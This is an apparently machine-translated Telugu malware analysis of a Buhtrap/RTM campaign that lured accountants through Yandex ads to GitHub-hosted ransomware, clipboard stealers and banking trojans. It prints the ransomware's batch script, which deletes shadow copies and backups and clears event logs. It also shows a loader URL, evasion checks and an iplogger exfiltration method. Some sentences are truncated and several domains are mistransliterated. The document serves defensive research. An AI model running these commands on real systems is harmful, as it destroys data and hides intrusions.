సైబర్ దాడిలో అకౌంటెంట్లను లక్ష్యంగా చేసుకోవడానికి, మీరు వారు ఆన్లైన్లో శోధించే పని పత్రాలను ఉపయోగించవచ్చు. తెలిసిన బ్యాక్డోర్లను పంపిణీ చేస్తూ గత కొన్ని నెలలుగా సైబర్ గ్రూప్ చేస్తున్న పని ఇదే.
Buhtrap యొక్క సోర్స్ కోడ్ గతంలో ఆన్లైన్లో లీక్ చేయబడింది కాబట్టి ఎవరైనా దానిని ఉపయోగించవచ్చు. RTM కోడ్ లభ్యతకు సంబంధించి మా వద్ద సమాచారం లేదు.
ఈ పోస్ట్లో దాడి చేసేవారు Yandex.Directని ఉపయోగించి మాల్వేర్ను ఎలా పంపిణీ చేశారో మరియు దానిని GitHubలో ఎలా హోస్ట్ చేశారో మేము మీకు తెలియజేస్తాము. మాల్వేర్ యొక్క సాంకేతిక విశ్లేషణతో పోస్ట్ ముగుస్తుంది.
బుహ్ట్రాప్ మరియు RTM తిరిగి వ్యాపారంలోకి వచ్చాయి
వ్యాప్తి మరియు బాధితుల యంత్రాంగం
బాధితులకు పంపిణీ చేయబడిన వివిధ పేలోడ్లు ఒక సాధారణ ప్రచార యంత్రాంగాన్ని పంచుకుంటాయి. దాడి చేసేవారు సృష్టించిన అన్ని హానికరమైన ఫైల్లు రెండు వేర్వేరు GitHub రిపోజిటరీలలో ఉంచబడ్డాయి.
సాధారణంగా, రిపోజిటరీ ఒక డౌన్లోడ్ చేయగల హానికరమైన ఫైల్ని కలిగి ఉంటుంది, ఇది తరచుగా మారుతూ ఉంటుంది. రిపోజిటరీకి మార్పుల చరిత్రను వీక్షించడానికి GitHub మిమ్మల్ని అనుమతిస్తుంది కాబట్టి, నిర్దిష్ట వ్యవధిలో ఏ మాల్వేర్ పంపిణీ చేయబడిందో మనం చూడవచ్చు. హానికరమైన ఫైల్ను డౌన్లోడ్ చేయమని బాధితుడిని ఒప్పించేందుకు, పై చిత్రంలో చూపిన వెబ్సైట్ blanki-shabloni24[.]ru ఉపయోగించబడింది.
సైట్ రూపకల్పన మరియు హానికరమైన ఫైల్ల యొక్క అన్ని పేర్లు ఒకే కాన్సెప్ట్ను అనుసరిస్తాయి - ఫారమ్లు, టెంప్లేట్లు, కాంట్రాక్ట్లు, నమూనాలు మొదలైనవి. గతంలో అకౌంటెంట్లపై దాడులలో బుహ్ట్రాప్ మరియు RTM సాఫ్ట్వేర్లు ఇప్పటికే ఉపయోగించబడుతున్నాయని మేము భావించాము. కొత్త ప్రచారంలో వ్యూహం అదే. దాడి చేసిన వారి వెబ్సైట్కు బాధితుడు ఎలా వచ్చాడనేది ఒక్కటే ప్రశ్న.
ఇన్ఫెక్షన్
ఈ సైట్లో చేరిన కనీసం అనేక మంది సంభావ్య బాధితులు హానికరమైన ప్రకటనల ద్వారా ఆకర్షితులయ్యారు. క్రింద ఒక ఉదాహరణ URL ఉంది:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
మీరు లింక్ నుండి చూడగలిగినట్లుగా, బ్యానర్ చట్టబద్ధమైన అకౌంటింగ్ ఫోరమ్ bb.f2[.]kzలో పోస్ట్ చేయబడింది. బ్యానర్లు వేర్వేరు సైట్లలో కనిపించాయని, అన్నింటికీ ఒకే ప్రచార ఐడి (blanki_rsya) ఉందని మరియు అకౌంటింగ్ లేదా చట్టపరమైన సహాయ సేవలకు సంబంధించినవి ఉన్నాయని గమనించడం ముఖ్యం. సంభావ్య బాధితుడు "డౌన్లోడ్ ఇన్వాయిస్ ఫారమ్" అభ్యర్థనను ఉపయోగించినట్లు URL చూపిస్తుంది, ఇది లక్ష్య దాడుల గురించి మా పరికల్పనకు మద్దతు ఇస్తుంది. బ్యానర్లు కనిపించిన సైట్లు మరియు సంబంధిత శోధన ప్రశ్నలు క్రింద ఉన్నాయి.
- ఇన్వాయిస్ ఫారమ్ను డౌన్లోడ్ చేయండి – bb.f2[.]kz
- నమూనా ఒప్పందం - Ipopen[.]ru
- అప్లికేషన్ ఫిర్యాదు నమూనా - 77metrov[.]ru
- ఒప్పందం రూపం - blank-dogovor-kupli-prodazhi[.]ru
- నమూనా కోర్టు పిటిషన్ - zen.yandex[.]ru
- నమూనా ఫిర్యాదు - yurday[.]ru
- నమూనా ఒప్పంద ఫారమ్లు – రెగ్ఫోరమ్[.]ru
- కాంట్రాక్ట్ ఫారమ్ – అసిస్టెంటస్[.]రు
- నమూనా అపార్ట్మెంట్ ఒప్పందం - నాప్రవా[.]com
- చట్టపరమైన ఒప్పందాల నమూనాలు - అవిటో[.]రు
blanki-shabloni24[.]ru సైట్ సాధారణ దృశ్య అంచనాను పాస్ చేయడానికి కాన్ఫిగర్ చేయబడి ఉండవచ్చు. సాధారణంగా, GitHubకి లింక్తో ప్రొఫెషనల్గా కనిపించే సైట్ని సూచించే ప్రకటన స్పష్టంగా చెడ్డదిగా అనిపించదు. అదనంగా, దాడి చేసేవారు హానికరమైన ఫైల్లను రిపోజిటరీకి పరిమిత కాలానికి మాత్రమే అప్లోడ్ చేశారు, ప్రచారం సమయంలో ఉండవచ్చు. ఎక్కువ సమయం, GitHub రిపోజిటరీ ఖాళీ జిప్ ఆర్కైవ్ లేదా ఖాళీ EXE ఫైల్ను కలిగి ఉంటుంది. అందువల్ల, దాడి చేసేవారు నిర్దిష్ట శోధన ప్రశ్నలకు ప్రతిస్పందనగా వచ్చిన అకౌంటెంట్లు ఎక్కువగా సందర్శించే సైట్లలో Yandex.Direct ద్వారా ప్రకటనలను పంపిణీ చేయవచ్చు.
తరువాత, ఈ విధంగా పంపిణీ చేయబడిన వివిధ పేలోడ్లను చూద్దాం.
పేలోడ్ విశ్లేషణ
పంపిణీ యొక్క కాలక్రమం
హానికరమైన ప్రచారం అక్టోబర్ 2018 చివరిలో ప్రారంభమైంది మరియు వ్రాసే సమయంలో చురుకుగా ఉంది. మొత్తం రిపోజిటరీ GitHubలో పబ్లిక్గా అందుబాటులో ఉన్నందున, మేము ఆరు వేర్వేరు మాల్వేర్ కుటుంబాల పంపిణీకి సంబంధించిన ఖచ్చితమైన టైమ్లైన్ను సంకలనం చేసాము (క్రింద ఉన్న బొమ్మను చూడండి). మేము git చరిత్రతో పోల్చడం కోసం ESET టెలిమెట్రీ ద్వారా కొలవబడిన బ్యానర్ లింక్ ఎప్పుడు కనుగొనబడిందో చూపించే పంక్తిని జోడించాము. మీరు చూడగలిగినట్లుగా, ఇది GitHubలో పేలోడ్ లభ్యతతో బాగా సంబంధం కలిగి ఉంటుంది. ఫిబ్రవరి చివరిలో ఉన్న వ్యత్యాసాన్ని మేము పూర్తిగా పొందేలోపు GitHub నుండి రిపోజిటరీ తీసివేయబడినందున మార్పు చరిత్రలో మాకు భాగం లేదని వివరించవచ్చు.
మూర్తి 1. మాల్వేర్ పంపిణీ యొక్క కాలక్రమం.
కోడ్ సంతకం సర్టిఫికెట్లు
ప్రచారం బహుళ ప్రమాణపత్రాలను ఉపయోగించింది. కొన్ని ఒకటి కంటే ఎక్కువ మాల్వేర్ కుటుంబాలు సంతకం చేశాయి, ఇది ఒకే ప్రచారానికి చెందిన వివిధ నమూనాలను సూచిస్తుంది. ప్రైవేట్ కీ అందుబాటులో ఉన్నప్పటికీ, ఆపరేటర్లు బైనరీలపై క్రమపద్ధతిలో సంతకం చేయలేదు మరియు అన్ని నమూనాల కోసం కీని ఉపయోగించలేదు. ఫిబ్రవరి 2019 చివరిలో, దాడి చేసే వ్యక్తులు తమ వద్ద ప్రైవేట్ కీ లేని Google యాజమాన్యంలోని సర్టిఫికేట్ను ఉపయోగించి చెల్లని సంతకాలను సృష్టించడం ప్రారంభించారు.
ప్రచారంలో పాల్గొన్న అన్ని ధృవపత్రాలు మరియు వారు సంతకం చేసిన మాల్వేర్ కుటుంబాలు దిగువ పట్టికలో జాబితా చేయబడ్డాయి.
మేము ఇతర మాల్వేర్ కుటుంబాలతో లింక్లను ఏర్పాటు చేయడానికి ఈ కోడ్ సంతకం సర్టిఫికేట్లను కూడా ఉపయోగించాము. చాలా సర్టిఫికేట్ల కోసం, మేము GitHub రిపోజిటరీ ద్వారా పంపిణీ చేయని నమూనాలను కనుగొనలేదు. అయినప్పటికీ, బోట్నెట్కు చెందిన మాల్వేర్పై సంతకం చేయడానికి TOV “MARIYA” ప్రమాణపత్రం ఉపయోగించబడింది
Win32/Filecoder.Buhtrap
మన దృష్టిని ఆకర్షించిన మొదటి భాగం కొత్తగా కనుగొనబడిన Win32/Filecoder.Buhtrap. ఇది డెల్ఫీ బైనరీ ఫైల్, ఇది కొన్నిసార్లు ప్యాక్ చేయబడుతుంది. ఇది ప్రధానంగా ఫిబ్రవరి-మార్చి 2019లో పంపిణీ చేయబడింది. ఇది ransomware ప్రోగ్రామ్కు తగినట్లుగా ప్రవర్తిస్తుంది - ఇది స్థానిక డ్రైవ్లు మరియు నెట్వర్క్ ఫోల్డర్లను శోధిస్తుంది మరియు కనుగొనబడిన ఫైల్లను గుప్తీకరిస్తుంది. ఎన్క్రిప్షన్ కీలను పంపడానికి ఇది సర్వర్ని సంప్రదించనందున రాజీపడటానికి దీనికి ఇంటర్నెట్ కనెక్షన్ అవసరం లేదు. బదులుగా, ఇది విమోచన సందేశం ముగింపుకు “టోకెన్”ని జోడిస్తుంది మరియు ఆపరేటర్లను సంప్రదించడానికి ఇమెయిల్ లేదా బిట్మెసేజ్ని ఉపయోగించమని సూచిస్తుంది.
వీలైనన్ని ఎక్కువ సున్నితమైన వనరులను గుప్తీకరించడానికి, Filecoder.Buhtrap గుప్తీకరణకు అంతరాయం కలిగించే విలువైన సమాచారాన్ని కలిగి ఉన్న ఓపెన్ ఫైల్ హ్యాండ్లర్లను కలిగి ఉండే కీ సాఫ్ట్వేర్ను మూసివేయడానికి రూపొందించిన థ్రెడ్ను అమలు చేస్తుంది. లక్ష్య ప్రక్రియలు ప్రధానంగా డేటాబేస్ నిర్వహణ వ్యవస్థలు (DBMS). అదనంగా, Filecoder.Buhtrap డేటా రికవరీ కష్టతరం చేయడానికి లాగ్ ఫైల్లు మరియు బ్యాకప్లను తొలగిస్తుంది. దీన్ని చేయడానికి, దిగువ బ్యాచ్ స్క్రిప్ట్ను అమలు చేయండి.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap వెబ్సైట్ సందర్శకుల గురించి సమాచారాన్ని సేకరించడానికి రూపొందించిన చట్టబద్ధమైన ఆన్లైన్ IP లాగర్ సేవను ఉపయోగిస్తుంది. ఇది కమాండ్ లైన్ యొక్క బాధ్యత అయిన ransomware బాధితులను ట్రాక్ చేయడానికి ఉద్దేశించబడింది:
mshta.exe "javascript:document.write('');"
మూడు మినహాయింపు జాబితాలతో సరిపోలకపోతే ఎన్క్రిప్షన్ కోసం ఫైల్లు ఎంపిక చేయబడతాయి. ముందుగా, కింది పొడిగింపులతో ఉన్న ఫైల్లు ఎన్క్రిప్ట్ చేయబడవు: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys మరియు .బ్యాట్. రెండవది, దిగువ జాబితా నుండి పూర్తి మార్గం డైరెక్టరీ స్ట్రింగ్లను కలిగి ఉన్న అన్ని ఫైల్లు మినహాయించబడ్డాయి.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
మూడవది, కొన్ని ఫైల్ పేర్లు కూడా ఎన్క్రిప్షన్ నుండి మినహాయించబడ్డాయి, వాటిలో విమోచన సందేశం యొక్క ఫైల్ పేరు. జాబితా క్రింద ప్రదర్శించబడింది. సహజంగానే, ఈ మినహాయింపులన్నీ మెషీన్ను రన్నింగ్లో ఉంచడానికి ఉద్దేశించబడ్డాయి, కానీ తక్కువ రహదారికి సంబంధించినవి.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
ఫైల్ ఎన్క్రిప్షన్ పథకం
ఒకసారి అమలు చేయబడిన తర్వాత, మాల్వేర్ 512-బిట్ RSA కీ జతను ఉత్పత్తి చేస్తుంది. ప్రైవేట్ ఘాతాంకం (d) మరియు మాడ్యులస్ (n) అప్పుడు హార్డ్-కోడెడ్ 2048-బిట్ పబ్లిక్ కీ (పబ్లిక్ ఎక్స్పోనెంట్ మరియు మాడ్యులస్), zlib-ప్యాక్డ్ మరియు బేస్64 ఎన్కోడ్తో గుప్తీకరించబడతాయి. దీనికి బాధ్యత వహించే కోడ్ మూర్తి 2లో చూపబడింది.
మూర్తి 2. 512-బిట్ RSA కీ జత ఉత్పత్తి ప్రక్రియ యొక్క హెక్స్-కిరణాల డీకంపైలేషన్ ఫలితం.
విమోచన సందేశానికి జోడించబడిన టోకెన్ అయిన ప్రైవేట్ కీతో కూడిన సాదా వచనానికి ఉదాహరణ క్రింద ఉంది.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
దాడి చేసేవారి పబ్లిక్ కీ క్రింద ఇవ్వబడింది.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
ఫైల్లు 128-బిట్ కీతో AES-256-CBCని ఉపయోగించి ఎన్క్రిప్ట్ చేయబడతాయి. ప్రతి ఎన్క్రిప్టెడ్ ఫైల్ కోసం, ఒక కొత్త కీ మరియు కొత్త ఇనిషియలైజేషన్ వెక్టర్ ఉత్పత్తి చేయబడతాయి. గుప్తీకరించిన ఫైల్ చివరకి కీలక సమాచారం జోడించబడుతుంది. గుప్తీకరించిన ఫైల్ ఆకృతిని పరిశీలిద్దాం.
గుప్తీకరించిన ఫైల్లు క్రింది శీర్షికను కలిగి ఉంటాయి:
VEGA మేజిక్ విలువతో కూడిన సోర్స్ ఫైల్ డేటా మొదటి 0x5000 బైట్లకు ఎన్క్రిప్ట్ చేయబడింది. మొత్తం డిక్రిప్షన్ సమాచారం కింది నిర్మాణంతో ఫైల్కు జోడించబడింది:
- ఫైల్ పరిమాణం మార్కర్ ఫైల్ పరిమాణంలో 0x5000 బైట్ల కంటే పెద్దదిగా ఉందో లేదో సూచించే గుర్తును కలిగి ఉంటుంది
— AES కీ బొట్టు = ZlibCompress(RSAEncrypt(AES కీ + IV, ఉత్పత్తి చేయబడిన RSA కీ జత యొక్క పబ్లిక్ కీ))
- RSA కీ బొట్టు = ZlibCompress(RSAEncrypt(జెనరేట్ చేయబడిన RSA ప్రైవేట్ కీ, హార్డ్-కోడెడ్ RSA పబ్లిక్ కీ))
Win32/ClipBanker
Win32/ClipBanker అనేది అక్టోబర్ చివరి నుండి డిసెంబర్ 2018 ప్రారంభం వరకు అడపాదడపా పంపిణీ చేయబడిన ఒక భాగం. క్లిప్బోర్డ్ యొక్క కంటెంట్లను పర్యవేక్షించడం దీని పాత్ర, ఇది క్రిప్టోకరెన్సీ వాలెట్ల చిరునామాల కోసం చూస్తుంది. లక్ష్య వాలెట్ చిరునామాను నిర్ణయించిన తర్వాత, ClipBanker దానిని ఆపరేటర్లకు చెందినదిగా విశ్వసించే చిరునామాతో భర్తీ చేస్తుంది. మేము పరిశీలించిన నమూనాలు బాక్స్డ్ లేదా అస్పష్టంగా లేవు. ప్రవర్తనను మాస్క్ చేయడానికి ఉపయోగించే ఏకైక మెకానిజం స్ట్రింగ్ ఎన్క్రిప్షన్. ఆపరేటర్ వాలెట్ చిరునామాలు RC4ని ఉపయోగించి గుప్తీకరించబడతాయి. టార్గెట్ క్రిప్టోకరెన్సీలు Bitcoin, Bitcoin cash, Dogecoin, Ethereum మరియు Ripple.
దాడి చేసేవారి బిట్కాయిన్ వాలెట్లకు మాల్వేర్ వ్యాప్తి చెందుతున్న కాలంలో, ఒక చిన్న మొత్తం VTSకి పంపబడింది, ఇది ప్రచారం యొక్క విజయంపై సందేహాన్ని కలిగిస్తుంది. అదనంగా, ఈ లావాదేవీలు క్లిప్బ్యాంకర్కు సంబంధించినవని సూచించడానికి ఎటువంటి ఆధారాలు లేవు.
Win32/RTM
Win32/RTM భాగం మార్చి 2019 ప్రారంభంలో చాలా రోజుల పాటు పంపిణీ చేయబడింది. RTM అనేది రిమోట్ బ్యాంకింగ్ వ్యవస్థలను లక్ష్యంగా చేసుకుని డెల్ఫీలో వ్రాయబడిన ట్రోజన్ బ్యాంకర్. 2017లో, ESET పరిశోధకులు ప్రచురించారు
బుహ్ట్రాప్ లోడర్
కొంత కాలం వరకు, GitHubలో ఒక డౌన్లోడర్ అందుబాటులో ఉంది, అది మునుపటి Buhtrap టూల్స్ను పోలి ఉండదు. అతను తిరుగుతాడు https://94.100.18[.]67/RSS.php?<some_id>
తదుపరి దశను పొందడానికి మరియు దానిని నేరుగా మెమరీలోకి లోడ్ చేస్తుంది. మేము రెండవ దశ కోడ్ యొక్క రెండు ప్రవర్తనలను వేరు చేయవచ్చు. మొదటి URLలో, RSS.php నేరుగా బుహ్ట్రాప్ బ్యాక్డోర్ను పాస్ చేసింది - ఈ బ్యాక్డోర్ సోర్స్ కోడ్ లీక్ అయిన తర్వాత అందుబాటులో ఉన్న దానితో సమానంగా ఉంటుంది.
ఆసక్తికరంగా, మేము బుహ్ట్రాప్ బ్యాక్డోర్తో అనేక ప్రచారాలను చూస్తాము మరియు అవి వేర్వేరు ఆపరేటర్లచే అమలు చేయబడుతున్నాయి. ఈ సందర్భంలో, ప్రధాన వ్యత్యాసం ఏమిటంటే, బ్యాక్డోర్ నేరుగా మెమరీలోకి లోడ్ చేయబడుతుంది మరియు మేము మాట్లాడిన DLL విస్తరణ ప్రక్రియతో సాధారణ పథకాన్ని ఉపయోగించదు.
రెండవది, మరింత సంక్లిష్టమైన ప్రవర్తన RSS.php URL మరొక లోడర్కు పంపబడింది. ఇది డైనమిక్ దిగుమతి పట్టికను పునర్నిర్మించడం వంటి కొన్ని అస్పష్టతను అమలు చేసింది. బూట్లోడర్ యొక్క ఉద్దేశ్యం C&C సర్వర్ని సంప్రదించడం
Android/Spy.Banker
ఆసక్తికరంగా, Android కోసం ఒక భాగం GitHub రిపోజిటరీలో కూడా కనుగొనబడింది. అతను ఒక రోజు మాత్రమే ప్రధాన శాఖలో ఉన్నాడు - నవంబర్ 1, 2018. GitHubలో పోస్ట్ చేయడమే కాకుండా, ESET టెలిమెట్రీ ఈ మాల్వేర్ పంపిణీ చేయబడిందని ఎటువంటి ఆధారాలు కనుగొనలేదు.
భాగం Android అప్లికేషన్ ప్యాకేజీ (APK) వలె హోస్ట్ చేయబడింది. ఇది భారీగా అస్పష్టంగా ఉంది. APKలో ఉన్న ఎన్క్రిప్టెడ్ JARలో హానికరమైన ప్రవర్తన దాగి ఉంది. ఇది ఈ కీని ఉపయోగించి RC4తో గుప్తీకరించబడింది:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
స్ట్రింగ్లను గుప్తీకరించడానికి అదే కీ మరియు అల్గోరిథం ఉపయోగించబడతాయి. JAR లో ఉంది APK_ROOT + image/files
. ఫైల్ యొక్క మొదటి 4 బైట్లు ఎన్క్రిప్టెడ్ JAR యొక్క పొడవును కలిగి ఉంటాయి, ఇది పొడవు ఫీల్డ్ తర్వాత వెంటనే ప్రారంభమవుతుంది.
ఫైల్ను డీక్రిప్ట్ చేసిన తర్వాత, అది అనుబిస్ అని మేము కనుగొన్నాము - ఇదివరకే
- మైక్రోఫోన్ రికార్డింగ్
- స్క్రీన్షాట్లు తీయడం
- GPS కోఆర్డినేట్లను పొందడం
- కీలాగర్
- పరికర డేటా ఎన్క్రిప్షన్ మరియు విమోచన డిమాండ్
- స్పామ్ పంపడం
ఆసక్తికరంగా, బ్యాంకర్ మరొక C&C సర్వర్ని పొందేందుకు Twitterను బ్యాకప్ కమ్యూనికేషన్ ఛానెల్గా ఉపయోగించారు. మేము విశ్లేషించిన నమూనా @JonesTrader ఖాతాను ఉపయోగించింది, కానీ విశ్లేషణ సమయంలో ఇది ఇప్పటికే బ్లాక్ చేయబడింది.
బ్యాంకర్ Android పరికరంలో లక్ష్య అనువర్తనాల జాబితాను కలిగి ఉన్నారు. ఇది సోఫోస్ అధ్యయనంలో పొందిన జాబితా కంటే ఎక్కువ. జాబితాలో అనేక బ్యాంకింగ్ అప్లికేషన్లు, Amazon మరియు eBay వంటి ఆన్లైన్ షాపింగ్ ప్రోగ్రామ్లు మరియు క్రిప్టోకరెన్సీ సేవలు ఉన్నాయి.
MSIL/ClipBanker.IH
ఈ ప్రచారంలో భాగంగా పంపిణీ చేయబడిన చివరి భాగం .NET Windows ఎక్జిక్యూటబుల్, ఇది మార్చి 2019లో కనిపించింది. అధ్యయనం చేసిన చాలా సంస్కరణలు ConfuserEx v1.0.0తో ప్యాక్ చేయబడ్డాయి. ClipBanker వలె, ఈ భాగం క్లిప్బోర్డ్ను ఉపయోగిస్తుంది. అతని లక్ష్యం క్రిప్టోకరెన్సీల విస్తృత శ్రేణి, అలాగే ఆవిరిపై ఆఫర్లు. అదనంగా, అతను బిట్కాయిన్ ప్రైవేట్ WIF కీని దొంగిలించడానికి IP లాగర్ సేవను ఉపయోగిస్తాడు.
రక్షణ మెకానిజమ్స్
డీబగ్గింగ్, డంపింగ్ మరియు ట్యాంపరింగ్ను నిరోధించడంలో ConfuserEx అందించే ప్రయోజనాలతో పాటు, యాంటీవైరస్ ఉత్పత్తులు మరియు వర్చువల్ మెషీన్లను గుర్తించే సామర్థ్యాన్ని కలిగి ఉంటుంది.
ఇది వర్చువల్ మెషీన్లో నడుస్తుందని ధృవీకరించడానికి, మాల్వేర్ BIOS సమాచారాన్ని అభ్యర్థించడానికి అంతర్నిర్మిత Windows WMI కమాండ్ లైన్ (WMIC)ని ఉపయోగిస్తుంది, అవి:
wmic bios
అప్పుడు ప్రోగ్రామ్ కమాండ్ అవుట్పుట్ను అన్వయిస్తుంది మరియు కీలకపదాల కోసం చూస్తుంది: VBOX, VirtualBox, XEN, qemu, bochs, VM.
యాంటీవైరస్ ఉత్పత్తులను గుర్తించడానికి, మాల్వేర్ విండోస్ సెక్యూరిటీ సెంటర్కు విండోస్ మేనేజ్మెంట్ ఇన్స్ట్రుమెంటేషన్ (WMI) అభ్యర్థనను పంపుతుంది ManagementObjectSearcher
క్రింద చూపిన విధంగా API. బేస్ 64 నుండి డీకోడింగ్ చేసిన తర్వాత కాల్ ఇలా కనిపిస్తుంది:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
మూర్తి 3. యాంటీవైరస్ ఉత్పత్తులను గుర్తించే ప్రక్రియ.
అదనంగా, మాల్వేర్ లేదో తనిఖీ చేస్తుంది
పట్టుదల
మేము అధ్యయనం చేసిన మాల్వేర్ వెర్షన్ దానికదే కాపీ అవుతుంది %APPDATA%googleupdater.exe
మరియు google డైరెక్టరీకి "దాచిన" లక్షణాన్ని సెట్ చేస్తుంది. అప్పుడు ఆమె విలువను మారుస్తుంది SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell
Windows రిజిస్ట్రీలో మరియు మార్గాన్ని జోడిస్తుంది updater.exe
. ఈ విధంగా, వినియోగదారు లాగిన్ అయిన ప్రతిసారీ మాల్వేర్ అమలు చేయబడుతుంది.
హానికరమైన ప్రవర్తన
క్లిప్బ్యాంకర్ వలె, మాల్వేర్ క్లిప్బోర్డ్లోని కంటెంట్లను పర్యవేక్షిస్తుంది మరియు క్రిప్టోకరెన్సీ వాలెట్ చిరునామాల కోసం చూస్తుంది మరియు కనుగొనబడినప్పుడు, దానిని ఆపరేటర్ చిరునామాలలో ఒకదానితో భర్తీ చేస్తుంది. కోడ్లో కనుగొనబడిన వాటి ఆధారంగా లక్ష్య చిరునామాల జాబితా క్రింద ఉంది.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
ప్రతి రకమైన చిరునామాకు సంబంధిత సాధారణ వ్యక్తీకరణ ఉంటుంది. STEAM_URL విలువ ఆవిరి సిస్టమ్పై దాడి చేయడానికి ఉపయోగించబడుతుంది, బఫర్లో నిర్వచించడానికి ఉపయోగించే సాధారణ వ్యక్తీకరణ నుండి చూడవచ్చు:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
ఎక్స్ఫిల్ట్రేషన్ ఛానల్
బఫర్లోని చిరునామాలను భర్తీ చేయడంతో పాటు, మాల్వేర్ Bitcoin, Bitcoin కోర్ మరియు Electrum Bitcoin వాలెట్ల ప్రైవేట్ WIF కీలను లక్ష్యంగా చేసుకుంటుంది. ప్రోగ్రామ్ WIF ప్రైవేట్ కీని పొందేందుకు plogger.orgని ఎక్స్ఫిల్ట్రేషన్ ఛానెల్గా ఉపయోగిస్తుంది. దీన్ని చేయడానికి, దిగువ చూపిన విధంగా, ఆపరేటర్లు వినియోగదారు-ఏజెంట్ HTTP హెడర్కు ప్రైవేట్ కీ డేటాను జోడిస్తారు.
మూర్తి 4. అవుట్పుట్ డేటాతో IP లాగర్ కన్సోల్.
ఆపరేటర్లు వాలెట్లను వెలికితీసేందుకు iplogger.orgని ఉపయోగించలేదు. ఫీల్డ్లో 255 అక్షరాల పరిమితి కారణంగా వారు బహుశా వేరే పద్ధతిని ఆశ్రయించారు User-Agent
IP లాగర్ వెబ్ ఇంటర్ఫేస్లో ప్రదర్శించబడుతుంది. మేము అధ్యయనం చేసిన నమూనాలలో, ఇతర అవుట్పుట్ సర్వర్ పర్యావరణ వేరియబుల్లో నిల్వ చేయబడింది DiscordWebHook
. ఆశ్చర్యకరంగా, ఈ ఎన్విరాన్మెంట్ వేరియబుల్ కోడ్లో ఎక్కడా కేటాయించబడలేదు. మాల్వేర్ ఇంకా అభివృద్ధిలో ఉందని మరియు ఆపరేటర్ యొక్క పరీక్ష యంత్రానికి వేరియబుల్ కేటాయించబడిందని ఇది సూచిస్తుంది.
